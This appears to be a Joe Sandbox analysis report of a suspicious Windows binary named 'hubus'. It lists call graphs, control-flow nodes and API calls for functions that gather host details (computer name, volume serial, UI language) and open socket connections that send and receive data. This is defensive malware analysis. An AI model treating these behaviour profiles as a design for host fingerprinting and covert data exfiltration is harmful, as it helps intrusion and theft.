14140 41673e 14139->14140 14152 43c160 LdrInitializeThunk 14139->14152 14143 4169ee 14140->14143 14144 4168ff 14140->14144 14145 416905 14140->14145 14153 43c160 LdrInitializeThunk 14140->14153 14149 43c160 LdrInitializeThunk 14143->14149 14145->14143 14154 43c160 LdrInitializeThunk 14145->14154 14148->14137 14149->14144 14150->14135 14151->14139 14152->14140 14153->14140 14154->14143 14155 41869f 14158 41bbe0 14155->14158 14157 4186af 14159 41bc20 14158->14159 14160 41be24 CreateDesktopW 14159->14160 14160->14157 14161 41cb61 14162 41cb80 14161->14162 14162->14162 14163 41cc3a 14162->14163 14164 41cc24 select 14162->14164 14164->14163 14165 430fa3 CoSetProxyBlanket 14166 43cc21 14167 43cc2b 14166->14167 14169 43ccfe 14167->14169 14172 43c160 LdrInitializeThunk 14167->14172 14171 43c160 LdrInitializeThunk 14169->14171 14171->14169 14172->14169 14173 421de0 14174 421e45 14173->14174 14175 421dee 14173->14175 14179 421f00 14175->14179 14177 421ebc 14177->14174 14178 4205d0 RtlAllocateHeap RtlFreeHeap RtlReAllocateHeap LdrInitializeThunk 14177->14178 14178->14174 14180 421f10 14179->14180 14180->14180 14181 43f7c0 LdrInitializeThunk 14180->14181 14182 42200f 14181->14182 14183 40eba3 CoInitializeSecurity CoInitializeSecurity 14184 43c367 14185 43c380 14184->14185 14187 43c3ce 14185->14187 14191 43c160 LdrInitializeThunk 14185->14191 14188 43c44e 14187->14188 14190 43c160 LdrInitializeThunk 14187->14190 14190->14188 14191->14187 14192 410d64 14195 410d81 14192->14195 14194 40f364 14195->14194 14196 415630 14195->14196 14197 415650 14196->14197 14197->14197 14198 43f5e0 LdrInitializeThunk 14197->14198 14199 415781 14198->14199 14200 41580a 14199->14200 14201 4157cd 14199->14201 14202 43f9c0 LdrInitializeThunk 14199->14202 14203 4157fb 14199->14203 14200->14194 14201->14200 14201->14203 14204 43fad0 LdrInitializeThunk 14201->14204 14202->14201 14203->14200 14203->14203 14205 415bfe 14203->14205 14209 43c160 LdrInitializeThunk 14203->14209 14204->14203 14210 43c160 LdrInitializeThunk 14205->14210 14208 415d2d 14209->14205 14210->14208 14211 435c65 14214 435c83 14211->14214 14212 435cf1 14214->14212 14215 43c160 LdrInitializeThunk 14214->14215 14215->14214 14216 40d7ec 14217 40d850 14216->14217 14220 40d8ae 14217->14220 14223 43c160 LdrInitializeThunk 14217->14223 14218 40d9ae 14220->14218 14222 43c160 LdrInitializeThunk 14220->14222 14222->14218 14223->14220 14224 40e5ad 14225 40e5d0 14224->14225 14229 437b10 14225->14229 14227 437b10 11 API calls 14228 40e712 14227->14228 14228->14227 14230 437b40 CoCreateInstance 14229->14230 14232 438140 14230->14232 14233 437d95 SysAllocString 14230->14233 14234 438150 GetVolumeInformationW 14232->14234 14236 437e1d 14233->14236 14244 438172 14234->14244 14237 437e25 CoSetProxyBlanket 14236->14237 14238 43812f SysFreeString 14236->14238 14239 438125 14237->14239 14240 437e45 SysAllocString 14237->14240 14238->14232 14239->14238 14242 437f00 14240->14242 14242->14242 14243 437f16 SysAllocString 14242->14243 14246 437f3a 14243->14246 14244->14228 14245 438113 SysFreeString SysFreeString 14245->14239 14246->14245 14247 438105 14246->14247 14248 437f7e VariantInit 14246->14248 14247->14245 14250 437fd0 14248->14250 14249 4380f4 VariantClear 14249->14247 14250->14249 14251 42d0f3 14252 42d0fe 14251->14252 14256 437740 14252->14256 14254 437740 LdrInitializeThunk 14255 42d10c 14254->14255 14255->14254 14257 43774e 14256->14257 14260 437842 14257->14260 14265 43c160 LdrInitializeThunk 14257->14265 14261 4378c4 14260->14261 14262 43795c 14260->14262 14264 43c160 LdrInitializeThunk 14260->14264 14261->14255 14262->14261 14266 43c160 LdrInitializeThunk 14262->14266 14264->14260 14265->14257 14266->14262 14267 41f4b0 14268 43ddb0 14267->14268 14269 41f532 getaddrinfo 14268->14269 14272 41f55c 14269->14272 14273 41f54e 14269->14273 14270 41f5b7 socket 14271 41f5cf connect 14270->14271 14270->14272 14271->14272 14271->14273 14272->14270 14272->14273 14273->14273 14274 41f915 send 14273->14274 14277 41f557 14273->14277 14275 41f927 14274->14275 14275->14277 14283 41ff20 14275->14283 14278 41fe7b 14278->14277 14279 41e800 send 14278->14279 14279->14277 14280 41ff20 recv 14282 41fc1d 14280->14282 14281 41f9aa 14281->14277 14281->14278 14281->14282 14282->14277 14282->14280 14286 41ff40 14283->14286 14284 41ff54 recv 14285 42012e 14284->14285 14284->14286 14285->14281 14286->14284 14286->14285 14286->14286 14287 43eff0 14288 43f001 14287->14288 14289 43f17e 14288->14289 14297 43c160 LdrInitializeThunk 14288->14297 14290 43f3cb 14289->14290 14292 43a8a0 RtlAllocateHeap 14289->14292 14293 43f1f9 14292->14293 14295 43f30e 14293->14295 14298 43c160 LdrInitializeThunk 14293->14298 14294 43a8d0 RtlFreeHeap 14294->14290 14295->14294 14297->14289 14298->14295 14299 4170b8 14306 415ed1 14299->14306 14301 43a920 3 API calls 14301->14306 14302 4176e9 14303 43ac40 LdrInitializeThunk 14303->14306 14304 43c160 LdrInitializeThunk 14304->14306 14305 416327 CreateProcessW 14305->14299 14305->14306 14306->14301 14306->14302 14306->14303 14306->14304 14306->14305 14307 43ab30 LdrInitializeThunk 14306->14307 14308 43acd0 LdrInitializeThunk 14306->14308 14309 41c0b0 14306->14309 14307->14306 14308->14306 14310 41c0f0 14309->14310 14310->14310 14311 40ac10 3 API calls 14310->14311 14312 41c315 14311->14312 14313 436db9 14314 436dd1 14313->14314 14315 436de8 GetUserDefaultUILanguage 14314->14315 14316 436e0e 14315->14316 14317 43c2fe 14318 43c307 GetForegroundWindow 14317->14318 14319 43c31a 14318->14319

                                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                                              Function 0041F4B0 Relevance: 35.8, APIs: 4, Strings: 16, Instructions: 850networkCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 431 41f4b0-41f54c call 43ddb0 getaddrinfo 434 41f55c-41f5a6 call 43ddb0 * 3 431->434 435 41f54e-41f551 431->435 451 41f5a8-41f5ac 434->451 452 41f5ec-41f60c call 43ddb0 434->452 437 41f612-41f61f 435->437 438 41f557 435->438 441 41f620-41f62b 437->441 439 41f9cb-41f9cd 438->439 444 41ff06-41ff10 439->444 441->441 443 41f62d-41f62f 441->443 446 41f630-41f637 443->446 446->446 448 41f639-41f63b 446->448 450 41f640-41f647 448->450 450->450 453 41f649-41f67b call 407f70 450->453 454 41f5b7-41f5cd socket 451->454 452->437 452->439 462 41f680-41f694 453->462 458 41f5b0-41f5b5 454->458 459 41f5cf-41f5dc connect 454->459 458->452 458->454 459->452 461 41f5de-41f5ea 459->461 461->458 462->462 464 41f696-41f6a8 462->464 466 41f6b0-41f6d9 464->466 466->466 467 41f6db-41f6e7 466->467 468 41f6e9-41f6ed 467->468 469 41f6fc-41f705 467->469 470 41f6f0-41f6fa 468->470 471 41f707-41f708 469->471 472 41f71c-41f727 469->472 470->469 470->470 473 41f710-41f71a 471->473 474 41f729-41f72f 472->474 475 41f73c-41f745 472->475 473->472 473->473 476 41f730-41f73a 474->476 477 41f747-41f748 475->477 478 41f75c-41f869 475->478 476->475 476->476 479 41f750-41f75a 477->479 480 41f870-41f8ae 478->480 479->478 479->479 480->480 481 41f8b0-41f8b6 480->481 482 41f8b8-41f8bf 481->482 483 41f8ce 481->483 485 41f8c0-41f8ca 482->485 484 41f8d2-41f8dd 483->484 487 41f8fc-41f925 call 43ddb0 send 484->487 488 41f8df-41f8e3 484->488 485->485 486 41f8cc 485->486 486->484 492 41f972-41f97e call 407f80 487->492 493 41f927-41f92a 487->493 489 41f8f0-41f8fa 488->489 489->487 489->489 492->439 498 41f980-41f9ac call 407f70 call 41ff20 492->498 493->492 495 41f92c-41f96d call 43ddb0 * 2 call 407f80 493->495 495->444 507 41f9b2-41f9c2 498->507 508 41fee5 498->508 511 41f9d2-41f9e7 507->511 512 41f9c4-41f9c6 507->512 510 41feec-41fef2 508->510 516 41ff03 510->516 517 41fef4-41fef8 510->517 513 41f9e9 511->513 514 41f9eb-41f9f6 call 407f70 511->514 518 41fb1c-41fb61 512->518 513->514 526 41fb0b-41fb18 514->526 527 41f9fc-41fa05 514->527 516->444 517->516 521 41fefa-41ff00 call 407f80 517->521 522 41fb70-41fbc6 518->522 521->516 522->522 525 41fbc8-41fbd3 522->525 529 41fc15-41fc17 525->529 530 41fbd5-41fbe1 525->530 526->518 533 41fab7-41fae9 527->533 534 41fa0b-41fa0d 527->534 531 41fe7b-41fe82 529->531 532 41fc1d-41fc29 529->532 535 41fbf7-41fbfc 530->535 531->508 539 41fe84-41fead call 41e800 531->539 538 41fc3c-41fc40 532->538 536 41faf8-41fb07 call 407f80 533->536 537 41faeb-41faf4 533->537 534->533 540 41fa13-41fa15 534->540 535->531 541 41fc02-41fc09 535->541 536->526 537->536 543 41fc61-41fc6d call 41ff20 538->543 544 41fc42-41fc5d 538->544 539->508 557 41feaf-41fedf call 43ddb0 * 2 539->557 540->536 546 41fa1b-41fa3c 540->546 547 41fc0b-41fc0d 541->547 548 41fc0f 541->548 543->508 560 41fc73-41fc86 543->560 544->543 552 41fa55-41fa5e 546->552 553 41fa3e-41fa40 546->553 547->548 554 41fc11-41fc13 548->554 555 41fbf0-41fbf5 548->555 552->536 559 41fa64-41fa66 552->559 558 41fa42-41fa4c 553->558 554->555 555->529 555->535 557->508 558->558 562 41fa4e-41fa52 558->562 563 41fa68-41fab3 559->563 564 41fc90-41fca5 560->564 565 41fc88-41fc8a 560->565 562->552 563->563 567 41fab5 563->567 569 41fca7 564->569 570 41fca9-41fcb4 call 407f70 564->570 568 41fdf7-41fe18 565->568 567->536 571 41fe20-41fe55 568->571 569->570 578 41fde6-41fdf3 570->578 579 41fcba-41fcc8 570->579 571->571 574 41fe57-41fe59 571->574 577 41fe60-41fe6b 574->577 581 41fe71-41fe74 577->581 582 41fc30-41fc36 577->582 578->568 583 41fd8f-41fdc3 579->583 584 41fcce-41fcd0 579->584 581->577 587 41fe76 581->587 582->510 582->538 588 41fdc5-41fdca 583->588 589 41fdce-41fde2 call 407f80 583->589 584->583 585 41fcd6-41fcd8 584->585 585->589 590 41fcde-41fcfc 585->590 587->582 588->589 589->578 592 41fd24-41fd29 590->592 593 41fcfe-41fd02 590->593 592->589 596 41fd2f-41fd33 592->596 595 41fd10-41fd1a 593->595 595->595 597 41fd1c-41fd20 595->597 598 41fd40-41fd8b 596->598 597->592 598->598 599 41fd8d 598->599 599->589
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • getaddrinfo.WS2_32(?,?,?,?), ref: 0041F544
                                                                                                                                                                                                                                                              • socket.WS2_32(?,FFFFFFFF,00000000), ref: 0041F5C0
                                                                                                                                                                                                                                                              • connect.WS2_32(00000000,?,?), ref: 0041F5D6
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: connectgetaddrinfosocket
                                                                                                                                                                                                                                                              • String ID: 31:;$6)0)$C*^|$G^$K@AF$SPBw$]o`z$`e:O$bWP$hyw{$jGAA$j|nd$ps"*$spsq$|xHc$~ezd
                                                                                                                                                                                                                                                              • API String ID: 3442012238-3735908906
                                                                                                                                                                                                                                                              • Opcode ID: 53b2bc7ce38ba8301f186daeda20eabb655fb0cee3e4cf776337617a46076f5f
                                                                                                                                                                                                                                                              • Instruction ID: 6c8cb3809aa182179536f77ea9d670f1b1b0665c40b2ce4c4df21e32de81a3e4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 53b2bc7ce38ba8301f186daeda20eabb655fb0cee3e4cf776337617a46076f5f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC52277450C3818BC321CF25C8506AFBBE1AF96314F18467EE4E54B392D739994BCB96
                                                                                                                                                                                                                                                              Function 00437B10 Relevance: 33.9, APIs: 11, Strings: 8, Instructions: 634memorycomCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 600 437b10-437b35 601 437b40-437b63 600->601 601->601 602 437b65-437b7a 601->602 603 437b80-437ba8 602->603 603->603 604 437baa-437bef 603->604 605 437bf0-437c49 604->605 605->605 606 437c4b-437c6a 605->606 608 437cd9-437ce4 606->608 609 437c6c-437c7f 606->609 611 437cf0-437d30 608->611 610 437c80-437ccd 609->610 610->610 612 437ccf-437cd4 610->612 611->611 613 437d32-437d8f CoCreateInstance 611->613 612->608 614 438140-438170 call 43ddb0 GetVolumeInformationW 613->614 615 437d95-437dcf 613->615 620 438172-438176 614->620 621 43817a-43817c 614->621 617 437dd0-437df2 615->617 617->617 619 437df4-437e1f SysAllocString 617->619 626 437e25-437e3f CoSetProxyBlanket 619->626 627 43812f-43813c SysFreeString 619->627 620->621 622 43818d-438194 621->622 624 4381a0-4381b8 622->624 625 438196-43819d 622->625 628 4381c0-4381f2 624->628 625->624 629 438125-43812b 626->629 630 437e45-437e59 626->630 627->614 628->628 631 4381f4-438225 628->631 629->627 632 437e60-437e7e 630->632 633 438230-438257 631->633 632->632 634 437e80-437ef6 SysAllocString 632->634 633->633 635 438259-438289 call 41f2a0 633->635 636 437f00-437f14 634->636 641 438290-438297 635->641 636->636 637 437f16-437f3c SysAllocString 636->637 642 438113-438122 SysFreeString * 2 637->642 643 437f42-437f64 637->643 641->641 644 438299-4382aa 641->644 642->629 651 437f6a-437f6d 643->651 652 438109-43810f 643->652 645 438180-438187 644->645 646 4382b0-4382c3 call 408100 644->646 645->622 648 4382c8-4382cf 645->648 646->645 651->652 653 437f73-437f78 651->653 652->642 653->652 654 437f7e-437fca VariantInit 653->654 655 437fd0-438011 654->655 655->655 656 438013-438025 655->656 657 438029-43802b 656->657 658 438031-438037 657->658 659 4380f4-438105 VariantClear 657->659 658->659 660 43803d-43804b 658->660 659->652 662 43808d 660->662 663 43804d-438052 660->663 665 43808f-4380b7 call 407f70 call 408c50 662->665 664 43806c-438070 663->664 666 438072-43807b 664->666 667 438060 664->667 676 4380b9 665->676 677 4380be-4380ca 665->677 670 438082-438086 666->670 671 43807d-438080 666->671 669 438061-43806a 667->669 669->664 669->665 670->669 673 438088-43808b 670->673 671->669 673->669 676->677 678 4380d1-4380f1 call 407fa0 call 407f80 677->678 679 4380cc 677->679 678->659 679->678
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CoCreateInstance.OLE32(0044168C,00000000,00000001,0044167C,00000000), ref: 00437D84
                                                                                                                                                                                                                                                              • SysAllocString.OLEAUT32(5C045A0B), ref: 00437DF9
                                                                                                                                                                                                                                                              • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00437E37
                                                                                                                                                                                                                                                              • SysAllocString.OLEAUT32(49F947F1), ref: 00437E85
                                                                                                                                                                                                                                                              • SysAllocString.OLEAUT32(18C206D6), ref: 00437F1B
                                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(83828188), ref: 00437F87
                                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 004380F5
                                                                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0043811A
                                                                                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 00438120
                                                                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00438130
                                                                                                                                                                                                                                                              • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043816C
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                                                                                                                                                                                                              • String ID: 6Z$6Z$;4$?jYl$C$UM$UM$z{|}
                                                                                                                                                                                                                                                              • API String ID: 2573436264-441414108
                                                                                                                                                                                                                                                              • Opcode ID: a633c24761fe19cdb29494bf90a08ae4ff31b84f00254bba1d2ed369a3c0b899
                                                                                                                                                                                                                                                              • Instruction ID: 32d1f029859c812e3577e43d14a4ed93bc1c567ea28ae8984151c89a2e27ba93
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a633c24761fe19cdb29494bf90a08ae4ff31b84f00254bba1d2ed369a3c0b899
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 77220FB6A083009FD314CF64D881B5BBBE6EFC9304F14892DF58587391EB78D9068B96
                                                                                                                                                                                                                                                              Function 004170B8 Relevance: 16.6, APIs: 1, Strings: 8, Instructions: 827COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 688 4170b8-4170bb 689 417410-41742a call 41c0b0 688->689 690 4170c2-4170cf 688->690 691 4172e7-417313 688->691 692 4171fc-417213 688->692 698 41742f-417435 689->698 695 4170d0-41715c 690->695 696 417320-4173ac 691->696 693 417220-4172ac 692->693 693->693 697 4172b2-4172ba 693->697 695->695 699 417162-41716e 695->699 696->696 700 4173b2-4173be 696->700 697->689 701 4172c0-4172cf 697->701 702 417440-417454 call 43a920 698->702 703 4171f0-4171f5 699->703 704 417174-41717f 699->704 705 4173c4-4173cf 700->705 706 415efa-415eff 700->706 708 4172d0-4172d7 701->708 730 4175d0-4175d4 702->730 731 4176c0-4176c5 702->731 732 4175b3-4175bf call 43ac40 702->732 733 417529-41753b 702->733 734 4176e9-4176ee 702->734 735 41745b-417468 702->735 736 4175db-4175ff 702->736 737 41746f-417486 702->737 738 41751f-417524 702->738 703->691 703->692 710 417180-417187 704->710 707 4173d0-4173d7 705->707 711 4162e7-4162e9 706->711 712 415f06 706->712 713 415f0c-415f23 706->713 715 415ed1-415ed7 707->715 716 4173dd-4173e0 707->716 718 4173e7-4173ed 708->718 719 4172dd-4172e0 708->719 721 417189-41718c 710->721 722 4171bc-4171c2 710->722 714 416313-416322 call 43ddb0 711->714 712->713 717 415f30-415f59 713->717 745 416327-416354 CreateProcessW 714->745 715->706 728 415ed9-415ef7 call 43c160 715->728 716->707 724 4173e2 716->724 717->717 725 415f5b-415f66 717->725 718->689 726 4173ef-417403 call 43c160 718->726 719->708 729 4172e2 719->729 721->710 739 41718e 721->739 722->703 723 4171c4-4171e6 call 43c160 722->723 723->703 724->706 741 415f68-415f6f 725->741 742 415f7b-415f88 725->742 726->689 728->706 729->689 730->731 730->734 730->736 731->730 731->731 731->732 731->733 731->735 731->736 731->737 731->738 746 4176cc-4176d2 731->746 732->738 749 417540-41756f 733->749 735->730 735->731 735->732 735->733 735->734 735->736 735->737 735->738 743 417600-41768c 736->743 747 417490-4174d2 737->747 738->702 739->703 754 415f70-415f79 741->754 756 415f90-415f98 742->756 743->743 755 417692-41769d 743->755 745->688 745->711 758 41630c 745->758 760 4176d8 746->760 761 4162eb-416303 call 43c160 746->761 747->747 751 4174d4-4174df 747->751 749->749 759 417571-417578 749->759 767 4174e1-4174e5 751->767 768 4174fb-417518 call 43ab30 751->768 754->742 754->754 764 4176e0-4176e2 755->764 765 41769f-4176af 755->765 756->756 766 415f9a-415fc4 756->766 758->714 769 41758b-4175a0 call 43acd0 759->769 770 41757a-41757f 759->770 760->764 761->758 764->730 764->731 764->732 764->733 764->734 764->735 764->736 764->737 764->738 774 4176b0-4176b7 765->774 775 415fc6 766->775 776 415fcb-416062 call 407f70 766->776 772 4174f0-4174f9 767->772 768->730 768->731 768->732 768->733 768->734 768->736 768->738 782 4175a5-4175ac 769->782 777 417580-417589 770->777 772->768 772->772 774->746 779 4176b9-4176bc 774->779 775->776 785 416070-4160b4 776->785 777->769 777->777 779->774 783 4176be 779->783 782->730 782->731 782->732 782->734 782->736 783->764 785->785 786 4160b6-41612f 785->786 787 416130-416159 786->787 787->787 788 41615b-41616c 787->788 789 416191-41619e 788->789 790 41616e-416175 788->790 792 4161c1-4161d1 789->792 793 4161a0-4161a4 789->793 791 416180-41618f 790->791 791->789 791->791 795 4161f1-416201 792->795 796 4161d3-4161da 792->796 794 4161b0-4161bf 793->794 794->792 794->794 798 416221-416230 795->798 799 416203-41620a 795->799 797 4161e0-4161ef 796->797 797->795 797->797 801 416251-4162e0 798->801 802 416232-416239 798->802 800 416210-41621f 799->800 800->798 800->800 801->711 801->758 803 416240-41624f 802->803 803->801 803->803
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: D$LE$P<?$h$tG$mA$$
                                                                                                                                                                                                                                                              • API String ID: 0-1044959716
                                                                                                                                                                                                                                                              • Opcode ID: 3bd0eb7773a7f0eb342e4de9093c3f613f1c8c1523e55b296f09a1b9cac2ca65
                                                                                                                                                                                                                                                              • Instruction ID: 0ecf633a13486c36528b468c443e3b834273b6a7a3fb2a9ce7e8bc01757ec871
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3bd0eb7773a7f0eb342e4de9093c3f613f1c8c1523e55b296f09a1b9cac2ca65
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B4255766083408FD724CF24C8907ABB7E2FFCA304F09896DE5C59B295DB789945CB86
                                                                                                                                                                                                                                                              Function 0042D4CF Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 445COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 804 42d4cf-42d52f call 43ddb0 808 42d530-42d596 804->808 808->808 809 42d598-42d5a2 808->809 810 42d5a4-42d5af 809->810 811 42d5bd 809->811 812 42d5b0-42d5b9 810->812 813 42d5c1-42d5ce 811->813 812->812 814 42d5bb 812->814 815 42d5d0-42d5d7 813->815 816 42d5eb-42d654 FreeLibrary call 43ddb0 GetComputerNameExA 813->816 814->813 817 42d5e0-42d5e9 815->817 821 42d660-42d67a 816->821 817->816 817->817 821->821 822 42d67c-42d686 821->822 823 42d69b-42d6a8 822->823 824 42d688-42d68f 822->824 826 42d6aa-42d6b1 823->826 827 42d6cb-42d726 GetComputerNameExA 823->827 825 42d690-42d699 824->825 825->823 825->825 828 42d6c0-42d6c9 826->828 829 42d730-42d74e 827->829 828->827 828->828 829->829 830 42d750-42d75a 829->830 831 42d75c-42d76a 830->831 832 42d77d 830->832 833 42d770-42d779 831->833 834 42d784-42d791 832->834 833->833 835 42d77b 833->835 836 42d793-42d79a 834->836 837 42d7ab-42d7fa 834->837 835->834 838 42d7a0-42d7a9 836->838 840 42d800-42d81a 837->840 838->837 838->838 840->840 841 42d81c-42d826 840->841 842 42d83b-42d848 841->842 843 42d828-42d82f 841->843 845 42d84a-42d851 842->845 846 42d86b-42d8c9 call 43ddb0 842->846 844 42d830-42d839 843->844 844->842 844->844 848 42d860-42d869 845->848 851 42d8d0-42d8f6 846->851 848->846 848->848 851->851 852 42d8f8-42d902 851->852 853 42d904-42d90b 852->853 854 42d91b-42d92d 852->854 855 42d910-42d919 853->855 856 42d933-42d93f 854->856 857 42da6f-42daab 854->857 855->854 855->855 858 42d940-42d94a 856->858 859 42dab0-42daec 857->859 860 42d960-42d966 858->860 861 42d94c-42d951 858->861 859->859 862 42daee-42dafe 859->862 864 42d990-42d99c 860->864 865 42d968-42d96b 860->865 863 42da10-42da16 861->863 866 42db00-42db07 862->866 867 42db1b-42db1e call 431310 862->867 872 42da18-42da1e 863->872 869 42d9a2-42d9a5 864->869 870 42da2a-42da32 864->870 865->864 873 42d96d-42d982 865->873 868 42db10-42db19 866->868 875 42db23-42db43 867->875 868->867 868->868 869->870 874 42d9ab-42da0f 869->874 877 42da34-42da36 870->877 878 42da38-42da3b 870->878 872->857 876 42da20-42da22 872->876 873->863 874->863 876->858 879 42da28 876->879 877->872 880 42da6b-42da6d 878->880 881 42da3d-42da69 878->881 879->857 880->863 881->863
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 0042D5F5
                                                                                                                                                                                                                                                              • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042D62F
                                                                                                                                                                                                                                                              • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042D6EF
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.12267535657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_hubus.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ComputerName$FreeLibrary
                                                                                                                                                                                                                                                              • String ID: /g$:!?w$Z!Xt$^
                                                                                                                                                                                                                                                              • API String ID: 2243422189-1434922922
                                                                                                                                                                                                                                                              • Opcode ID: 19a61970159725aceee255d92c9b2e5e9dd3bcb96c21c50fd331cbd9fab3b85b
                                                                                                                                                                                                                                                              • Instruction ID: 4697a7a2b7991663a3431a9e595b2f93c3a4af1ad7168bdcbedf7ab2257885db
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 19a61970159725aceee255d92c9b2e5e9dd3bcb96c21c50fd331cbd9fab3b85b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 60D10360A0C3E18AD7358F3994507ABBBE1AF97304F58489ED5CD97383C779440ACB66
                                                                                                                                                                                                                                                              Function 0042D4CA Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 438COMMON
                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 1006 42d4ca-42d606 call 43ddb0 1009 42d60b-42d654 GetComputerNameExA 1006->1009 1010 42d660-42d67a 1009->1010 1010->1010 1011 42d67c-42d686 1010->1011 1012 42d69b-42d6a8 1011->1012 1013 42d688-42d68f 1011->1013 1015 42d6aa-42d6b1 1012->1015 1016 42d6cb-42d726 GetComputerNameExA 1012->1016 1014 42d690-42d699 1013->1014 1014->1012 1014->1014 1017 42d6c0-42d6c9 1015->1017 1018 42d730-42d74e 1016->1018 1017->1016 1017->1017 1018->1018 1019 42d750-42d75a 1018->1019 1020 42d75c-42d76a 1019->1020 1021 42d77d 1019->1021 1022 42d770-42d779 1020->1022 1023 42d784-42d791 1021->1023 1022->1022 1024 42d77b 1022->1024 1025 42d793-42d79a 1023->1025 1026 42d7ab-42d7fa 1023->1026 1024->1023 1027 42d7a0-42d7a9 1025->1027 1029 42d800-42d81a 1026->1029 1027->1026 1027->1027 1029->1029 1030 42d81c-42d826 1029->1030 1031 42d83b-42d848 1030->1031 1032 42d828-42d82f 1030->1032 1034 42d84a-42d851 1031->1034 1035 42d86b-42d8c9 call 43ddb0 1031->1035 1033 42d830-42d839 1032->1033 1033->1031 1033->1033 1037 42d860-42d869 1034->1037 1040 42d8d0-42d8f6 1035->1040 1037->1035 1037->1037 1040->1040 1041 42d8f8-42d902 1040->1041 1042 42d904-42d90b 1041->1042 1043 42d91b-42d92d 1041->1043 1044 42d910-42d919 1042->1044 1045 42d933-42d93f 1043->1045 1046 42da6f-42daab 1043->1046 1044->1043 1044->1044 1047 42d940-42d94a 1045->1047 1048 42dab0-42daec 1046->1048 1049 42d960-42d966 1047->1049 1050 42d94c-42d951 1047->1050 1048->1048 1051 42daee-42dafe 1048->1051 1053 42d990-42d99c 1049->1053 1054 42d968-42d96b 1049->1054 1052 42da10-42da16 1050->1052 1055 42db00-42db07 1051->1055 1056 42db1b-42db1e call 431310 1051->1056 1061 42da18-42da1e 1052->1061 1058 42d9a2-42d9a5 1053->1058 1059 42da2a-42da32 1053->1059 1054->1053 1062 42d96d-42d982 1054->1062 1057 42db10-42db19 1055->1057 1064 42db23-42db43 1056->1064 1057->1056 1057->1057 1058->1059 1063 42d9ab-42da0f 1058->1063 1066 42da34-42da36 1059->1066 1067 42da38-42da3b 1059->1067 1061->1046 1065 42da20-42da22 1061->1065 1062->1052 1063->1052 1065->1047 